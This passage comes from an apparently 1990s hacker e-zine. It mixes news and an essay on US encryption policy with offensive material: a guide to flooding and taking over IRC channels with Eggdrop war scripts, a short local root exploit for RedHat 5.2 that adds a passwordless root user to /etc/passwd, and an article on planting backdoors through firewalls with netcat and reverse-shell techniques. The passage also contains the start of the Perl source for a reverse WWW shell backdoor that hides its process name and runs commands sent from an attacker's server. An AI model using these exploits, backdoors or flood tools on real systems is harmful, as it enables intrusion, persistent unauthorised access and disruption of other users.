Machinery, said the proposed bill bodes poorly for citizens' privacy. "Our lives are moving more and more online," she said. "There's always the risk that some future government or administration might compromise the rights and freedoms we enjoy today and take advantage of this technology." The proposed bill was not a surprise, she said, because FBI Director Louis Freeh "has been pushing to have access keys for a long time." Fred Smith, an attorney in Santa Fe, N.M., who works as a special prosecutor in computer cases, said he does not believe the administration's motives are nefarious. "I really believe that there's a serious and good faith concern about what we're going to do if encryption takes off the way it appears to be taking off at the moment," he said. A spokesman for DOJ described the proposal as "pending" and declined to comment on it. One Capitol Hill staffer had some concerns. "I think they are really trying to hobble how people use encryption," said Ellen Stroud, spokeswoman for Rep. Bob Goodlatte (R-Va.), sponsor of the Security and Freedom through Encryption Act, which would relax controls on the export of encryption and prohibit the government from requiring a backdoor into people's e-mail and computer files. Stroud said law enforcement officials examining electronic files as they pursue criminals in cyberspace could accidentally modify or destroy a company's legitimate files. "[The proposal] doesn't provide the needed protection for companies using encryption," she said. "You're putting yourself at greater liability [if you use a third-party firm to keep encryption keys.] It's easier for somebody to search you." Stroud also said owners of information searched during a criminal investigation will not necessarily know what information law enforcement officials have been examining because the draft bill would allow law enforcement officials in some cases to delay issuing notice of the search warrant. "If you want information from me, come to me and get it," Stroud said. "Why go to somewhere else? Why go to my neighbor? If you have a problem, hit it straight on." @HWA 04.0 The lost art of IRC warfare using eggdrop bots ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I found this while looking for a country script for a certain bot on a certain channel and found it pretty informative...so its here for you to peruse and perhaps learn a thing or two from the 'other' side of IRC. - Ed IRC WAR ~~~~~~~~ Fighting with, and against, the Eggdrop Bot! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Stormking The properly configured Eggdrop bot is one of the most powerful IRC war machines, able to flood, icmp, nuke, and easily takeover channels. It is also damn near impossible to kill! On this page I will try to teach you a few of the tricks of configuring and using the Eggdrop Warbot. By itself Eggdrop is little more than a tough irc client. The heart of the warbot is in the various tcl scripts designed to wreak havoc on IRC! I'll tell you what they are, where to get them, and how to set them up for maximum damage. First, lets make sure yer bot's protection is set up properly. Eggdrop flood protection is set in the config file, way down in the "###MORE ADVANCED STUFF###" section. Heres an example from a 1.1.4 bot: # how many msgs in how many seconds from the same host constitutes a flood? set flood-msg 5:60 # how many public msgs in how many seconds? set flood-chan 10:60 # how many joins/nick changes in how many seconds? set flood-join 5:60 # how many CTCPs in how many seconds? set flood-ctcp 3:60 You can change these to yer liking but I find that the defaults work just fine in most cases. Some bot masters run an extra tcl for protection such as ctcpprot but I've rarely had a bot flud off with the defaults. If you feel you need extra protection, its there. Fighting With Eggdrop So you got a new bot and you want to be a badass? Well, its easy enough to do. After you have yer bot's protection squared away, you'll need a few tcl scripts to help you on yer way. I don't have the server space to offer all the available war tcls but you can get most any of them at ftp://ftp.sodre.net/pub/eggdrop/ in the appropriate scripts section for yer bot version. Here's a list of some of my favorites: - icmp tcl Fabulous, if yer shell supports ping - Chantoolz Has its own floods too. For 1.0x - takeover.tcl Self explanatory. For 1.0x - massmode1.1a.tcl 1.1x takeover script - mjoin.tcl A mass join script for botnets - flud501e.tcl 1.0x fludnet scripts. Rox their asses! - flud501f-oc.tcl 501e modified for 1.1x bots - Wardrop.tcl Most everything combined into one script! There are also a few advanced Unix war programs like "botnuke", "ssping", and "pepsi" but they require root access so almost noone can use them. If you have root access, you likely don't need me to tell you how to play war on Unix! The same goes for the fabled "spoofers", if you have them, you know how to use them. OK, now that we have them, how do we use them? Well, most have their own help files. Use them. Anytime you are planning on loading a script you should always open it in an editor to see if there is anything you need to set before loading it. Now's a good time to look the script over for the basic commands, and the help commands! For example, the help file in takeover.tcl is accessed with the command ".thelp". This is a typical usage. Sometimes there are settings for which user flag will be required to use the tcl. Most default to +m but you can change that. My recommendation is to leave it as +m or even +n. Don't let all yer users access your bot's war stuff unless you want problems with opers. Let's talk a little about icmp.tcl. This script rox, if you can use it. Unfortunately most shells don't allow ping or allow only very limited pinging. Its easy to find out if you got lucky.... Just load the script, no editing needed for the test. In dcc type ".set icmp 1". Now get someone's dns addy (the numeric one, do "/dns nick" in mIRC) and type ".icmp addy", putting the dns addy instead of the word "addy" of course.... Your bot will do one of several things. Most likely it will say "Sorry, this shell does not support ping". If it does, yer s.o.l., unload the script. It might, however, say "now icmp flooding". If it floods, watch yer victim (or use yer own dns for the test) and see if he poofs. If he drops off within a few minutes you are one of the lucky ones! If not, your ping is limited to a useless level. The help file for icmp.tcl is "icmp". Another kewl script is mjoin.tcl. Its a botnet mass join/part script. Its usage is real simple, just load it and type ".mjoin #channel". Every bot on yer net which is running this script will join that channel. Use ".mpart #channel" to get them out. This script can be loads of fun but use it carefully as some people don't care for their bots being jerked into strange channels. Those people, of course, shouldn't run this tcl but some do...... The king of the Eggdrop war scripts is flud.tcl, available in various versions. The ones I prefer are available above. Use 501e for 1.0x bots and 501f for 1.1x. 501e comes complete with 2 versions, a standard -oc version and a +oc version. The +oc (stands for oper-check) will check the victim before fludding and abort fluds on opers, a damn good idea! There is a bit more to this tcl, both in setup and use, than most of the others. To get started open the tcl in any editor EXCEPT PICO (pico doesn't like long lines). You will see these settings at the top: # set flag1 "e" ;# Flag suggested for fludflag. set fludword "flud" ;# Word to use for fluding set fludflag "m" ;# Flag required for fluding. set fludver "501-e" ;# Flud Version. DON'T Change(I'll kill you if you do)! set fludmax 10 ;# Max times to flud. set fluddef 5 ;# Default flud times. set fludnap45 ;# Leave this at 45 to keep the net in synch! set fludnet "EFnet" ;# Net you are on. set fludact 1 ;# Flud on or off? (0/1) set ircnick "" ;# Define your IRC nickname here. EXTREME PROTECTION! set fludnick 0 ;# Change to 1 to Enable Nick Changes during fludz. The first one, #set flag1 "e", you have to uncomment if you want to use it. It gives users a seperate flag if they are allowed to flud. I never use this, I just leave the fludflag at "m", allowing any master to flud. The only settings you might need to change here are the fludnet, ircnick, and fludnick. Fludnet, obviously, should be set to the network yer bot is on. Ircnick allows 1.0x bots to have a different nick on the botnet and on irc, a good idea in my opinion. 1.1x allows you to set "botnet nick" in the config file so its not needed here. Fludnick is an interesting feature, very useful but somewhat annoying. It changes yer bot's nick during fluds to a random nick, such as SJYT233, then changes it back again after the flud. This can save you from k-lines when the victim sends his log to an oper but can be a bitch in a busy channel. I always set fludnick 1. All my bots flud and I have very few k-lines. Its up to you! OK, once you have these things set its time to learn how to use flud. The help file for flud.tcl is ".fludhelp". You will need it. There are many types of fluds available, each useful in certain situations. The basic syntax for fluds is ".flud/ nick /# of times/ type of flud". In other words, ".flud butthead 10 15" would flud butthead 10 times with a type 15 flud, a "Boom" echo flud. Always use 10 for the number of lines as most fludbots are set for a maximum of 10. If my victim is a standard mIRC client I like to start with the Boom flud. If there are above 30 fludbots available he will usually drop. If he doesn't drop, he may be running an advanced mIRC script and be basically un-fludable. Against bots I use a "4" or clientinfo flud. Sometimes it works. Another kewl flud is the "22" or privmsg flud. This one opens a bunch of little chat windows on yer victims screen. Not very effective but annoying as hell! Experiment, find yer own favorites. A few other useful commands are ".fludbots", which tells you how many bots will flud, and ".last" which tells who made the last flud. Set yer console to +5 to see flud results and progress. Always remember the main rule of fludding, do a /whois on yer victim before fludding. DO NOT EVER flud irc operators. To do so risks not only yer own bots but all fludbots on the net. Most botnets will kick you off for fludding an oper. Remember this. You have been warned. Fighting Against Eggdrop Since Eggdrops are UNIX processes they are invincible to standard nuking and such things as will easily kill a Windoze client. A strong icmp, such as from a T3, will kill a bot but thats about it. This assumes, of course, that yer bot is on a solid shell (Win-Eggs are NOT included). I've also had limited success with an old DOS based proggie called Flash. Most Eggdrops don't blink at this but a few will drop. Its worth a try if you need to kill an Eggdrop. If you have a good fludnet behind you (say 50 or more fludbots) you can sometimes drop an Egg with a standard flud. I find that clientinfo fluds (usually flud type 4) work best against Eggdrops. Again, most won't blink but a few will fall. You can also try a good nuker set for non-standard protocols like "host unreachable". If these things don't work yer likely stuck with waiting and hoping the bot's shell goes down so you can jump in the channel and quickly kill the other users, grabbing ops before the bot returns. In Conclusion Many people nowadays say things like "IRC war is lame" or "the days of IRC war are over". Well, lame it may be, but dead it certainly isn't. I am a firm believer in peace on Earth, and on IRC, but I also believe that peace is best maintained, in both cases, through superior firepower. @HWA 05.0 Finally a working redhat 5.2 local exploit - From BlackBox issue #1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by icesk HAPPY_FILE="/etc/passwd" MAGIC_FILE="/tmp/.font-unix" MAGIC_USER="1C3SK" LOGIN=`which login` ln -s $HAPPY_FILE $MAGIC_FILE echo "made symlink;" `ls -l $MAGIC_FILE` while (HAPPY_FILE=HAPPY_FILE); do sleep 2; if [ -w $HAPPY_FILE ]; then echo $MAGIC_USER"::0:0::/:/bin/sh:" echo $MAGIC_USER"::0:0::/:/bin/sh:" >> /etc/passwd $LOGIN $MAGIC_USER exit fi; done fi done @HWA 06.0 The state of crypto today ~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hackernews.com/ contributed by Brian Oblivion Cyberspace Electronic Security Act, CALEA, OECD, The Wassenaar Arrangement, SAFE, HR-2616, S798, HR-2617, UCITA, and on and on and on. Just what the hell is going on? The government wants crypto controls and the public doesn't. Buffer Overflow http://www.hackernews.com/orig/buffero.html The State of Crypto Policy Today: If you have nothing to hide... By: Brian Oblivion L0pht Heavy Industries The World remains forever changed by the promise of international telecommunications. For the past 3 decades we have enjoyed an ever growing communications explosion providing a mechanism for the free flow of information internationally. With early communications systems, Governments could easily setup listening posts on international links before exiting the country via undersea cable or satellite uplinks. Prior to the mid-1980's the resources to protect communications via cryptography were cost prohibitive and physically constraining. Privacy is power, therefore it must be regulated. Today, the proliferation of high-performance, low-power, low-cost micro-processors have opened the door to build cryptographic protection into all communication systems. This would render existing governmental listening outposts obsolete. We know this is true, due to the scrambling at hand on curtailing the proliferation of strong encryption systems and software. The intelligence communities have noticed a sharp increase in encrypted traffic across the communications networks of the world. This originally prompted the US (United States) to advertise the use of Key Escrow/Recovery encryption, where the keys used to protect information would be stored by a trusted third party. Later, a key could "lawfully" be obtained to decrypt stored files or communications in real-time once protected by that key. International and domestic opposition to Key escrow/recovery systems has seemed to triumph in Europe and most of the world. The OECD (Organization for Economic Cooperation and Development), a Paris-based international body of 29 countries, resisted lobbying by the US Department of Justice, FBI and NSA to endorse key escrow/recovery systems. The European Union is a staunch opponent to Key Escrow regimes and is presently removing inter-union restrictions on encryption products, leading the way for other countries to adopt privacy focused strategies. In addition to OECD, The Wassenaar Arrangement, a 32 country body, sets export controls for conventional weapons and sensitive dual-use goods and technologies. The US successfully lobbies this organization, and uses it to assert its crypto policy on an international scale. The bulk of the restrictions on dual-use goods and technologies are uncannily similar to those which are promulgated by the United States. Recently the Arrangement increased export restrictions on encryption products with 64-bit or greater key sizes. In light of this new restriction, many countries have voiced their opposition to this change in policy and plan on not adopting the new restriction. While no country is bound by any of these agreements, they are encouraged to adopt the guidelines set forth by these bodies. When countries fail to adequately interpret the guidelines to be in line with US interpretation, diplomatic consultation results. Recently Janet Reno, US Attorney General, wrote the chancellor of Germany's Federal Secretary of Justice to restrict the distribution of "public domain" encryption products. It can be surmised that the position of the US is to petition others to remove all public domain encryption software from distribution servers currently on the Internet. As a direct result of this international collaboration of encryption policy, the US has recently published its policy on encryption usage, as House Resolution HR-2616. The policy is mostly well founded, and while still not relaxing encryption export controls on encryption bit lengths over 64-bit, it still allows US Citizens to use any encryption they should choose without mandating key escrow mechanisms. " ...it shall be lawful for any person within any State and for any United States person to use any encryption product, regardless of encryption algorithm selected, encryption bit length chosen, or implementation technique or medium used." Hopefully the public at large will act responsibly with encryption technology. As with the current view of firearms, this freedom is likely to be short lived. Nowhere in the document does it discuss the ramifications of keeping keys in tamper-responsive hardware. Nor does it discuss the ramifications of reverse-engineering cryptographic implementations. It can be read that as long as you do not decrypt someone's communications or medium without their consent you are exempt from the laws referenced therein. There is also exclusion for encryption products and services which are used solely for access control, digital signatures, authentication or similar purposes. This does allow the decryption of passwords, and the like for security auditing and other such practices. However, Government encryption use is called to use escrowed cryptography, as well as are government contractors engaged in contract work for the government. This is actually more of a blessing than an impediment, where the government at least will have to continue to operate responsibly. The provision still exists where all investigations thwarted by the use of encryption will be recorded by the Attorney General, and maintained in classified form. The results of these findings will undoubtedly sway future addendums to the current policy toward encryption. The Security and Freedom through Encryption Act (SAFE), once a very liberating legislative initiative, has since come under attack by law enforcement and the intelligence community. The original goal of SAFE was to relax all exportation restrictions regardless of encryption key length. However, the restrictions are now back in the Act, with exceptions for key lengths of 64 bits or less. All other encryption software must first be subject to governmental review before permission can be granted for export. The export restriction on key length is to be set by a newly formed Encryption Export Advisory board, which shall be comprised of a chairman under the Secretary of Commerce for Export Administration. Seven other individuals appointed by the President representative of the NSA, CIA, the Office of the President, and four from the private sector who have expertise in the information security field. The board is to report to the president every 30 days on what encryption technology is suitable for export. The president can still override any recommendation they may come up with. The SAFE act continues prohibition on Federal or State governmental mandated key escrow systems. A provision stating that encrypted communications alone is not "probable cause" to obtain a search warrant to request the cleartext of said communications is a big win for privacy advocates. It blocks a blanket probable cause to eavesdrom on all communications, once the majority of traffic is encrypted. There are some extra penalties for using encryption to hide "criminal" activity. One can realize that this may become immaterial once it becomes the exception to not encrypt your communications channels or your storage mediums. Especially as the trend for hidden and low level crypto systems is on the rise. Another disturbing attribute is the mandatory, one-time 15-day technical review of your algorithms/equipment with the Secretary of Commerce. There are some specific restrictions for equipment which can be used for military or intelligence end use, or which may be used for terrorist organizations. It would seem that the definition of what can be construed as such equipment can be quite broad and applied to almost all encryption technologies. As with the US Crypto Policy house resolution, a committee to research buggered prosecutions due to the employment of encryption technologies, is to be established. The database will be 'classified', and accessible by appropriate law enforcement agencies. The results of this investigation will undoubted be used as a case to repeal the prohibition of mandated key escrow systems or a change in export policies. This bill has been introduced into the senate as the PROTECT Act of 1999, S798 IS. Money is power, therefore we are Taxed. HR 2617, "To amend the Internal Revenue Code of 1986 to allow a tax credit for development costs of encryption products with plaintext capability without the user's knowledge." There is a move in Congress (HR 2617) to alter the existing tax law to allow corporations which develop and implement encryption technologies a tax deduction. This tax deduction is not a reward for a high level of security, but rather, if the system has the capability of escrowing keys used in the system. In order for this strategy to work, taxes would continue to rise, thereby aiding those who conform to . The legitimate basis for this Resolution may be to stimulate development to support the US Governments own request for Key escrowed/recovery systems for its use. Privacy is privilege, therefore communications are supervised. To further understand the commitment the US Government has on domestic intelligence dominance, the Communications Assistance for Law Enforcement ACT (CALEA), which will provide law enforcement agencies cleartext or clearvoice in near real-time without the endusers knowledge, is clearing hurdle after hurdle. CALEA was once opposed by the telecommunications industry, but now that the Federal Government has removed the monetary burden, from industry to the government, almost all dissension has been quelled. Performing such a wiretap is permitted only by a court order. But with all new technology, remote capabilities and ease of use will undoubtedly provide some risk unauthorized monitoring of otherwise private communications. Another possibility is during emergency war powers or some other crisis, the inconvenience of obtaining a court order to perform a wiretap could be waived by a predatorial government, resulting in broad, undetectable eavesdropping capabilities. To thwart such activity, personal encryption technology will still be required to circumvent the buggered, state sponsored systems. Knowledge is power, therefore it must be controlled. In the US, The National Conference of Commissioners for Uniform State Laws (NCCUSL) has approved and adopted the Uniform Computer Information Transactions Act (UCITA). While this document has been criticized publicly by Attorney Generals from various states, some of the flaws are detrimental to security applications and condone poor programming practices. Even after cryptographic algorithms are verified to be relatively secure at a certain point in time, the implementation of the overall system utilizing the algorithm can be flawed. One must push software's bounds of normal operations to flesh out any potentially revealing error conditions. Using software outside of it's intended use is considered a breach of contract, and prohibited by the UCITA. There are also stipulations for publicly posting criticizing statements against faulty software. As security groups have proven, many times security holes are only addressed once widebanded to a software company's peers and customers. Cryptographic implementations must be allowed public scrutiny and analysis by ones peers. An implementation steeped in secrecy is usually flawed and obfuscated to prevent the revelation of such flaws. Removing the service of independent analysis will degrade the overall state of security in the industry, leaving the holes in the hands of manditory federal reviewers. As we move into the next millennium the topic of encryption will continue to strike up heated debate between Intelligence Communities and liberty advocates. The world is mostly comfortable to give up its privacy for a little security. This is usually done in comfortable political climates. Should that climate ever change, we will have given Government the keys to our lives, and the ability to keep its interests above and beyond the will its subjects. The cryptographic debate boils down to: the ability to communicate without the fear of government intrusion, or the possibility for all of your communications to be intercepted by an uninvited third party. If you have nothing to hide... OCED Cryptography Policy http://www.oecd.org/dsti/sti/it/secur/prod/e-crypto.htm Cryptography and Liberty 1999 http://www2.epic.org/reports/crypto1999.html UCITA http://www.law.upenn.edu/bll/ulc/ucita/citam99.htm EPIC Cryptographic Policy Review http://www.epic.org/crypto @HWA 07.0 Using a backdoor in a firewalled system ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [ http://www.rootshell.com/ ] -------------------------[ Placing Backdoors Through Firewalls --------[ van Hauser / THC ----[ Introduction This article describes possible backdoors through different firewall architectures. However, the material can also be applied to other environments to describe how hackers (you?) cover their access to a system. Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new firewalls and patched vulnerabilities. To accomplish this the attackers must install a backdoor which a) does it's job and b) is not easily detectable. The kind of backdoor needed depends on the firewall architecture used. As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun. ----[ Firewall Architectures There are two basic firewall architectures and each has an enhanced version. Packet Filters: This is a host or router which checks each packet against an allow/deny ruletable before routing it through the correct interface. There are very simple ones which can only filter from the origin host, destination host and destination port, as well as good ones which can also decide based on incoming interface, source port, day/time and some tcp or ip flags. This could be a simple router, f.e. any Cisco, or a Linux machine with firewalling activated (ipfwadm). Stateful Filters: This is the enhanced version of a packet filter. It still does the same checking against a rule table and only routes if permitted, but it also keeps track of the state information such as TCP sequence numbers. Some pay attention to application protocols which allows tricks such as only opening ports to the interiour network for ftp-data channels which were specified in a permitted ftp session. These filters can (more or less) get UDP packets (f.e. for DNS and RPC) securely through the firewall. (Thats because UDP is a stateless protocol. And it's more difficult for RPC services.) This could be a great OpenBSD machine with the ip-filter software, a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1. Proxies / Circuit Level Gateways: A proxy as a firewall host is simply any server which has no routing activated and instead has proxy software installed. Examples of proxy servers which may be used are squid for WWW, a sendmail relay configuration and/or just a sockd. Application Gateways: This is the enhanced version of a proxy. Like a proxy, for every application which should get through the firewall a software must be installed and running to proxy it. However, the application gateway is smart and checks every request and answer, f.e. that an outgoing ftp only may download data but not upload any, and that the data has got no virus, no buffer overflows are generated in answers etc. One can argue that squid is an application gateway, because it does many sanity checks and let you filter stuff but it was not programmed for the installation in a secure environment and still has/had security bugs. A good example for a freeware kit for this kind is the TIS firewall toolkit (fwtk). Most firewalls that vendors sell on the market are hybrid firwalls, which means they've got more than just one type implemented; for example the IBM Firewall is a simple packet filter with socks and a few proxies. I won't discuss which firewall product is the best, because this is not a how-to-by-a-firewall paper, but I will say this: application gateways are by far the most secure firewalls, although money, speed, special protocols, open network policies, stupidity, marketing hype and bad management might rule them out. ----[ Getting in Before we talk about what backdoors are the best for which firewall architecture we should shed a light on how to get through a firewall the first time. Note that getting through a firewall is not a plug-n-play thing for script-kiddies, this has to be carefully planned and done. The four main possibilities: Insider: There's someone inside the company (you, girlfriend, chummer) who installs the backdoor. This is the easiest way of course. Vulnerable Services: Nearly all networks offer some kind of services, such as incoming email, WWW, or DNS. These may be on the firewall host itself, a host in the DMZ (here: the zone in front of the firewall, often not protected by a firewall) or on an internal machine. If an attacker can find a hole in one of those services, he's got good chances to get in. You'd laugh if you saw how many "firewalls" run sendmail for mail relaying ... Vulnerable External Server: People behind a firewall sometimes work on external machines. If an attacker can hack these, he can cause serious mischief such as the many X attacks if the victim uses it via an X-relay or sshd. The attacker could also send fake ftp answers to overflow a buffer in the ftp client software, replace a gif picture on a web server with one which crashs netscape and executes a command (I never checked if this actually works, it crashs, yeah, but I didn't look through this if this is really an exploitable overflow). There are many possibilities with this but it needs some knowledge about the company. However, an external web server of the company is usually a good start. Some firewalls are configured to allow incoming telnet from some machines, so anyone can sniff these and get it. This is particulary true for the US, where academic environments and industry/military work close together. Hijacking Connections: Many companies think that if they allow incoming telnet with some kind of secure authentication like SecureID (secure algo?, he) they are safe. Anyone can hijack these after the authentication and get in ... Another way of using hijacked connections is to modify replies in the protocol implementation to generate a buffer overflow (f.e. with X). Trojans: Many things can be done with a trojan horse. This could be a gzip file which generates a buffer overflow (well, needs an old gzip to be installed), a tar file which tampers f.e. ~/.logout to execute something, or an executable or source code which was modified to get the hacker in somehow. To get someone running this, mail spoofing could be used or replacing originals on an external server which internal employees access to update their software regulary (ftp xfer files and www logs can be checked to get to know which files these are). ----[ Placing the Backdoors An intelligent hacker will not try to put the backdoors on machines in the firewall segment, because these machines are usually monitored and checked regulary. It's the internal machines which are usually unprotected and without much administration and security checks. I will now talk about some ideas of backdoors which could be implemented. Note that programs which will/would run on an stateful filter will of course work with a normal packet filter too, same for the proxy. Ideas for an application gateway backdoor will work for any architecture. Some of them are "active" and others "passive". "Active" backdoors are those which can be used by a hacker anytime he wishes, a "passive" one triggers itself by time/event so an attacker has to wait for this to happen. Packet Filters: It's hard to find a backdoor which gets through this one but does not work for any other. The few ones which comes into my mind is a) the ack-telnet. It works like a normal telnet/telnetd except it does not work with the normal tcp handshake/protocol but uses TCP ACK packets only. Because they look like they belong to an already established (and allowed) connection, they are permitted. This can be easily coded with the spoofit.h of Coder's Spoofit project (http://reptile.rug.ac.be/~coder). b) Loki from Phrack 49/51 could be used too to establish a tunnel with icmp echo/reply packets. But some coding would be needed to to be done. c) daemonshell-udp is a backdoor shell via UDP (http://r3wt.base.org look for thc-uht1.tgz) d) Last but not least, most "firewall systems" with only a screening router/firewall let any incoming tcp connection from the source port 20 to a highport (>1023) through to allow the (non-passive) ftp protocol to work. "netcat -p 20 target port-of-bindshell" is the fastest solution for this one. Stateful Filters: Here a hacker must use programs which initiates the connection from the secure network to his external 0wned server. There are many out there which could be used: active: tunnel from Phrack 52. ssh with the -R option (much better than tunnel ... it's a legtimitate program on a computer and it encrypts the datastream). passive: netcat compiled with the execute option and run with a time option to connect to the hacker machine (ftp.avian.org). reverse_shell from the thc-uht1.tgz package does the same. Proxies / Circuit Level Gateways: If socks is used on the firewall, someone can use all those stuff for the stateful filter and "socksify" them. (www.socks.nec.com) For more advanced tools you'd should take a look at the application gateway section. Application Gateways: Now we get down to the interesting stuff. These beasts can be intelligent so some brain is needed. active: (re-)placing a cgi-script on the webserver of the company, which allows remote access. This is unlikely because it's rare that the webserver is in the network, not monitored/ checked/audited and accessible from the internet. I hope nobody needs an example on such a thing ;-) (re-placing) a service/binary on the firewall. This is dangerous because those are audited regulary and sometimes even sniffed on permanent ... Loading a loadable module into the firewall kernel wich hides itself and gives access to it's master. The best solution for an active backdoor but still dangerous. passive: E@mail - an email account/mailer/reader is configured in a way to extract hidden commands in an email (X-Headers with weird stuff) and send them back with output if wanted/needed. WWW - this is hard stuff. A daemon on an internal machine does http requests to the internet, but the requests are in real the answers of commands which were issued by a rogue www server in a http reply. This nice and easy beast is presented below (->Backdoor Example: The Reverse WWW Shell) DNS - same concept as above but with dns queries and replies. Disadvantage is that it can not carry much data. (http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this example needs still much coding to be any effective) ----[ Backdoor Example: The Reverse WWW Shell This backdoor should work through any firewall which has got the security policy to allow users to surf the WWW (World Wide Waste) for information for the sake and profit of the company. For a better understanding take a look at the following picture and try to remember it onwards in the text: +--------+ +------------+ +-------------+ |internal|--------------------| FIREWALL |--------------|server owned | | host | internal network +------------+ internet |by the hacker| +--------+ +-------------+ SLAVE MASTER Well, a program is run on the internal host, which spawns a child every day at a special time. For the firewall, this child acts like a user, using his netscape client to surf on the internet. In reality, this child executes a local shell and connects to the www server owned by the hacker on the internet via a legitimate looking http request and sends it ready signal. The legitimate looking answer of the www server owned by the hacker are in reality the commands the child will execute on it's machine it the local shell. All traffic will be converted (I'll not call this "encrypted", I'm not Micro$oft) in a Base64 like structure and given as a value for a cgi-string to prevent caching. Example of a connection: Slave GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krjVAEfg HTTP/1.0 Master replies with g5mAlfbknz The GET of the internal host (SLAVE) is just the command prompt of the shell, the answer is an encoded "ls" command from the hacker on the external server (MASTER). Some gimmicks: The SLAVE tries to connect daily at a specified time to the MASTER if wanted; the child is spawned because if the shell hangs for whatever reason you can check & fix the next day; if an administrator sees connects to the hacker's server and connects to it himself he will just see a broken webserver because there's a Token (Password) in the encoded cgi GET request; WWW Proxies (f.e. squid) are supported; program masks it's name in the process listing ... Best of all: master & slave program are just one 260-lines perl file ... Usage is simple: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl" on the MASTER just before it's time that the slave tries to connect. Well, why coding it in perl? a) it was very fast to code, b) it's highly portable and c) I like it. If you want to use it on a system which hasn't got perl installed, search for a similar machine with perl install, get the a3 compiler from the perl CPAN archives and compile it to a binary. Transfer this to your target machine and run that one. The code for this nice and easy tool is appended in the section THE CODE after my last words. If you've got updates/ideas/critics for it drop me an email. If you think this text or program is lame, write me at root@localhost. Check out http://r3wt.base.org for updates. ----[ Security Now it's an interesting question how to secure a firewall to deny/detect this. It should be clear that you need a tight application gateway firewall with a strict policy. email should be put on a centralized mail server, and DNS resolving only done on the WWW/FTP proxies and access to WWW only prior proxy authentication. However, this is not enough. An attacker can tamper the mailreader to execute the commands extracted from the crypted X-Headers or implement the http authentication into the reverse www-shell (it's simple). Also checking the DNS and WWW logs/caches regulary with good tools can be defeated by switching the external servers every 3-20 calls or use aliases. A secure solution would be to set up a second network which is connected to the internet, and the real one kept seperated - but tell this the employees ... A good firewall is a big improvement, and also an Intrusion Detection Systems can help. But nothing can stop a dedicated attacker. ----[ Last Words Have fun hacking/securing the systems ... Greets to all guys who like + know me ;-) and especially to those good chummers I've got, you know who you are. Ciao... van Hauser / [THC] - The Hacker's Choice For further interesting discussions you can email me at vh@reptile.rug.be with my public pgp key below : Type Bits/KeyID Date User ID pub 2048/CDD6A571 1998/04/27 van Hauser / THC -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD /3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN 1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ 2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/ Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw== =MdzX -----END PGP PUBLIC KEY BLOCK----- ----[ THE CODE <++> rwwwshell.pl #!/usr/bin/perl # Reverse-WWW-Tunnel-Backdoor v1.5 # (c) 1998 by van Hauser / [THC] - The Hacker's Choice # Check out http://r3wt.base.org for updates # # GENERAL CONFIG (except for $MASK, everything must be the same # for MASTER and SLAVE is this section!) # $CGI_PREFIX="/cgi-bin/order?"; # should look like cgi. "?" as last char! $MASK="vi"; # for masking the program's process name $PASSWORD="THC"; # anything, nothing you have to rememeber # (not a real "password" anyway) # # MASTER CONFIG (specific for the MASTER) # $LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080) $SERVER="localhost"; # the host to run on (ip/dns) (the SLAVE needs this!) # # SLAVE CONFIG (specific for the SLAVE) # $SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh) $DELAY="3"; # time to wait for output after your command(s) $TIME="00:01"; # time when to connect to the master (unset if now) $DAILY="sure"; # tries to connect once daily if set with something $PROXY=""; # set this with the Proxy if you must use one $PROXY_PORT=""; # set this with the Proxy Port if you must use one # END OF CONFIG # nothing for you to do after this point # ################## BEGIN MAIN CODE ################## require 5.002; use Socket; $|=1; # next line changes our process name if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; } undef $DAILY if (! $TIME); if ( !($PROXY) || !($PROXY_PORT) ) { undef $PROXY; undef $PROXY_PORT; } $protocol = getprotobyname('tcp'); if ($ARGV[0] ne "") { if ($ARGV[0] eq "-h") { print STDOUT "no commandline option : daemon mode\n"; print STDOUT "using \"-h\" as 